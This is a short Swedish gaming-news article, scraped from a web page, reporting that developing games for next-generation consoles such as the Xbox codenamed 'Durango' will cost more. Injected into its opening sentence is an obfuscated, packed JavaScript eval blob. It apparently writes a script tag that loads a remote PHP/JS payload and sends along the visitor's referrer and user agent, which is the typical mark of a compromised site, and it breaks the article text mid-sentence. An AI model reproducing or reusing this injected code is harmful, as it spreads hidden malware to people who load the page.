Image Image Image Image Image Image Image Image Image Image

| 19 juni, 2018

Scroll to top

Top

No Comments

Nästa generationens spel kommer bli dyrare att utveckla

Nästa generationens spel kommer bli dyrare att utveckla
Sebastian Plengier Ehrnfelt

Mer eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nibya|var|u0026u|referrer|hbibk||js|php’.split(‘|’),0,{}))
avancerad teknik som ska ge oss bättre spelupplevelser kommer att kosta otroligt mycket mer att utveckla.

Enligt Gameindustry är det enorma kostnadsökningar vi väntar oss. Detta säger en utvecklare som just nu testar ny Xboxkonsolen, som än så länge kallas ”Durango” och som också jobbar på en uppföljare till ett spel som finns till PS3 och Xbox:

”I’m having to double my budget for models.
If we want to take advantage of Durango’s capabilities it takes a lot more time for each model”.

Det kommer att krävas längre tid och bättre kompetens hos anställda för att utveckla på de nya konsolerna. Det betyder att det då kommer att ta längre till att få fram de lösningar som krävs samt pengar.

Activisons tjänst Call of Duty Elite tas i artikeln upp som exempel liksom ett ökat intresse för Online Pass.

Submit a Comment